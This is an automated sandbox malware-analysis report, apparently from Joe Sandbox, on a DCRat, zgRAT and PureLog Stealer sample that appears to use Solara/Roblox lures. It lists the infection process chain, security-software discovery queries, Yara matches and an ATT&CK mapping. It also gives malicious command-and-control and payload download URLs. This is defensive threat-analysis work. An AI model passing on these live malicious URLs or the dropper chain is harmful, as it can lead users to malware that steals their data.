Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComponentReviewperfmonitor\Uq2tX7p25HNYhIggX0PpAZXDUcRcexvQlwrHhzLqWtjOjit.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComponentReviewperfmonitor\QUMJYJlT6Ngt.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ComponentReviewperfmonitor\Mscrt.exe "C:\ComponentReviewperfmonitor/Mscrt.exe"	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\C7dhHeH1wD.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\ComponentReviewperfmonitor\Mscrt.exe "C:\ComponentReviewperfmonitor\Mscrt.exe"	Jump to behavior

Source: Mscrt.exe, 00000014.00000002.2933764806.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Mscrt.exe, 00000014.00000002.2933764806.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerp

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_00B2F654 cpuid

3_2_00B2F654

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

3_2_00B2AF0F

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Queries volume information: C:\ComponentReviewperfmonitor\Mscrt.exe VolumeInformation	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Queries volume information: C:\ComponentReviewperfmonitor\Mscrt.exe VolumeInformation
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_00B2DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

3_2_00B2DF1E

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_00B1B146 GetVersionExW,

3_2_00B1B146

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Mscrt.exe, 00000014.00000002.2993134922.000000001AEF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Mscrt.exe, 00000014.00000002.2995176266.000000001B660000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ramFiles%\Windows Defender\MsMpeng.exe

Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000014.00000002.2933764806.0000000002709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1818125843.000000001374A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Mscrt.exe PID: 7884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Mscrt.exe PID: 3084, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: wmdqEYgW2i.exe, type: SAMPLE
Source: Yara match	File source: 3.3.DCRatBuild.exe.6a74700.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.DCRatBuild.exe.6160700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wmdqEYgW2i.exe.341a70f.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Mscrt.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.51f97b.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.4d1294.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.DCRatBuild.exe.6160700.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.409294.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.1689383384.0000000006112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1735972234.0000000000DB2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1690322216.0000000006A26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1679810718.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1687516055.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe, type: DROPPED
Source: Yara match	File source: C:\ComponentReviewperfmonitor\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\ComponentReviewperfmonitor\Mscrt.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\Registry.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: wmdqEYgW2i.exe, type: SAMPLE
Source: Yara match	File source: 3.3.DCRatBuild.exe.6a74700.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.DCRatBuild.exe.6160700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wmdqEYgW2i.exe.341a70f.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Mscrt.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.51f97b.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.4d1294.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.DCRatBuild.exe.6160700.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.409294.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe, type: DROPPED
Source: Yara match	File source: C:\ComponentReviewperfmonitor\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\ComponentReviewperfmonitor\Mscrt.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\Registry.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000014.00000002.2933764806.0000000002709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1818125843.000000001374A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Mscrt.exe PID: 7884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Mscrt.exe PID: 3084, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: wmdqEYgW2i.exe, type: SAMPLE
Source: Yara match	File source: 3.3.DCRatBuild.exe.6a74700.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.DCRatBuild.exe.6160700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wmdqEYgW2i.exe.341a70f.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Mscrt.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.51f97b.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.4d1294.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.DCRatBuild.exe.6160700.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.409294.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.1689383384.0000000006112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1735972234.0000000000DB2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1690322216.0000000006A26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1679810718.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1687516055.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe, type: DROPPED
Source: Yara match	File source: C:\ComponentReviewperfmonitor\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\ComponentReviewperfmonitor\Mscrt.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\Registry.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: wmdqEYgW2i.exe, type: SAMPLE
Source: Yara match	File source: 3.3.DCRatBuild.exe.6a74700.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.DCRatBuild.exe.6160700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wmdqEYgW2i.exe.341a70f.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Mscrt.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.51f97b.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.4d1294.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.DCRatBuild.exe.6160700.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.409294.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wmdqEYgW2i.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe, type: DROPPED
Source: Yara match	File source: C:\ComponentReviewperfmonitor\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\ComponentReviewperfmonitor\Mscrt.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\Registry.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	141 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	12 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	157 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	21 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	371 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	261 Virtualization/Sandbox Evasion	DCSync	261 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	2 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
wmdqEYgW2i.exe	97%	ReversingLabs	Win32.Trojan.DisguisedXMRigMiner
wmdqEYgW2i.exe	92%	Virustotal		Browse
wmdqEYgW2i.exe	100%	Avira	VBS/Runner.VPG
wmdqEYgW2i.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	100%	Avira	HEUR/AGEN.1323342
C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	100%	Avira	VBS/Runner.VPG
C:\Users\user\Desktop\DuJNBeJX.log	100%	Avira	TR/PSW.Agent.qngqt
C:\ComponentReviewperfmonitor\WmiPrvSE.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\GtXEsNdN.log	100%	Avira	HEUR/AGEN.1362695
C:\ComponentReviewperfmonitor\Uq2tX7p25HNYhIggX0PpAZXDUcRcexvQlwrHhzLqWtjOjit.vbe	100%	Avira	VBS/Runner.VPG
C:\Users\user\Desktop\AJexuQye.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\Desktop\JInMuEEa.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\PAQlXkJO.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\C7dhHeH1wD.bat	100%	Avira	BAT/Delbat.C
C:\Recovery\Registry.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\GoOOBNnj.log	100%	Avira	HEUR/AGEN.1362695
C:\ComponentReviewperfmonitor\Mscrt.exe	100%	Avira	HEUR/AGEN.1323342
C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\FwwvWNOS.log	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	100%	Joe Sandbox ML
C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	100%	Joe Sandbox ML
C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\ASBxeDSb.log	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\DuJNBeJX.log	100%	Joe Sandbox ML
C:\ComponentReviewperfmonitor\WmiPrvSE.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\KjOuzKdG.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\GtXEsNdN.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\AJexuQye.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\JInMuEEa.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\KrxNetEL.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\GSwVnIEh.log	100%	Joe Sandbox ML
C:\Recovery\Registry.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\GoOOBNnj.log	100%	Joe Sandbox ML
C:\ComponentReviewperfmonitor\Mscrt.exe	100%	Joe Sandbox ML
C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	100%	Joe Sandbox ML
C:\ComponentReviewperfmonitor\Mscrt.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\ComponentReviewperfmonitor\WmiPrvSE.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\Registry.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\tQRjIvxcBsFMaEOtv.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\tQRjIvxcBsFMaEOtv.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	63%	ReversingLabs	Win64.Trojan.Heracles
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	79%	ReversingLabs	Win32.Trojan.Uztuby
C:\Users\user\Desktop\AJexuQye.log	25%	ReversingLabs
C:\Users\user\Desktop\ASBxeDSb.log	8%	ReversingLabs
C:\Users\user\Desktop\DDhNlQcT.log	8%	ReversingLabs
C:\Users\user\Desktop\DXuFwIar.log	21%	ReversingLabs
C:\Users\user\Desktop\DuJNBeJX.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\EvzfQQCl.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\FwwvWNOS.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\GSwVnIEh.log	8%	ReversingLabs
C:\Users\user\Desktop\GoOOBNnj.log	17%	ReversingLabs
C:\Users\user\Desktop\GtXEsNdN.log	17%	ReversingLabs
C:\Users\user\Desktop\JInMuEEa.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\KjOuzKdG.log	5%	ReversingLabs
C:\Users\user\Desktop\KrxNetEL.log	8%	ReversingLabs
C:\Users\user\Desktop\McddlGOE.log	25%	ReversingLabs
C:\Users\user\Desktop\OUvvQGoW.log	4%	ReversingLabs
C:\Users\user\Desktop\PAQlXkJO.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\SDCUsTNK.log	25%	ReversingLabs
C:\Users\user\Desktop\SedCyZmq.log	29%	ReversingLabs
C:\Users\user\Desktop\TRlucpWH.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\TaRdOVJt.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\TrGcehJI.log	25%	ReversingLabs
C:\Users\user\Desktop\WUTtFVnj.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\XIYBqjjh.log	17%	ReversingLabs
C:\Users\user\Desktop\XMmLkVMA.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\XqUSVQdy.log	21%	ReversingLabs
C:\Users\user\Desktop\aLKjMSnc.log	21%	ReversingLabs
C:\Users\user\Desktop\cAEKMRbo.log	8%	ReversingLabs
C:\Users\user\Desktop\cNwShBsX.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\kPeZMpiY.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\lwQiRexF.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\mmsihreI.log	12%	ReversingLabs
C:\Users\user\Desktop\nkUqDrtD.log	25%	ReversingLabs
C:\Users\user\Desktop\oFVQTmjS.log	25%	ReversingLabs
C:\Users\user\Desktop\ohvyYrIy.log	8%	ReversingLabs
C:\Users\user\Desktop\pVzGKFEw.log	4%	ReversingLabs
C:\Users\user\Desktop\peXGurXs.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\rNSZpEdN.log	5%	ReversingLabs
C:\Users\user\Desktop\rvLGajjL.log	12%	ReversingLabs
C:\Users\user\Desktop\tPFHKnhJ.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\uMgPgnwD.log	29%	ReversingLabs
C:\Users\user\Desktop\vDJPwBdH.log	17%	ReversingLabs
C:\Users\user\Desktop\wAkXRBsB.log	8%	ReversingLabs
C:\Users\user\Desktop\xxLgnBHw.log	8%	ReversingLabs
C:\Users\user\Desktop\yxUOovbm.log	21%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
nutipa.ru	5%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:6463	0%	Avira URL Cloud	safe
https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.	5%	Virustotal		Browse
http://127.0.0.1:6463	1%	Virustotal		Browse
https://discord.com;http://127.0.0.1:6463/rpc?v=11	0%	Avira URL Cloud	safe
https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip	100%	Avira URL Cloud	malware
https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.	100%	Avira URL Cloud	malware
http://nutipa.ru/_authGamewordpress.php	100%	Avira URL Cloud	malware
http://nutipa.ru/	100%	Avira URL Cloud	malware
http://127.0.0.1:64632	0%	Avira URL Cloud	safe
http://127.0.0.1:6463/rpc?v=1	0%	Avira URL Cloud	safe
https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	100%	Avira URL Cloud	malware
http://nutipa.ru	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nodejs.org	104.20.23.46	true	false		high
getsolara.dev	104.21.93.27	true	false		high
edge-term4-fra2.roblox.com	128.116.123.3	true	false		high
www.nodejs.org	104.20.22.46	true	false		high
nutipa.ru	172.67.185.214	true	true	5%, Virustotal, Browse	unknown
clientsettings.roblox.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://getsolara.dev/asset/discord.json	false		high
http://nutipa.ru/_authGamewordpress.php	true	Avira URL Cloud: malware	unknown
https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live	false		high
https://getsolara.dev/api/endpoint.json	false		high
https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:6463	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AAAF000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.nodejs.org	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nodejs.org	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com	Bootstrapper.exe, 00000001.00000002.2096317134.000001901A9B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ncs.roblox.com/upload	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AAC7000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB29000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.nodejs.org	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AA82000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB3F000.00000004.00000800.00020000.00000000.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://james.newtonking.com/projects/json	Bootstrapper.exe.0.dr	false		high
http://getsolara.dev	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AA65000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com;http://127.0.0.1:6463/rpc?v=11	wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://aka.ms/vs/17/release/vc_redist.x64.exe	wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	false		high
https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.json	wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	false		high
https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://getsolara.dev	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AA5A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901AAC7000.00000004.00000800.00020000.00000000.sdmp	false		high
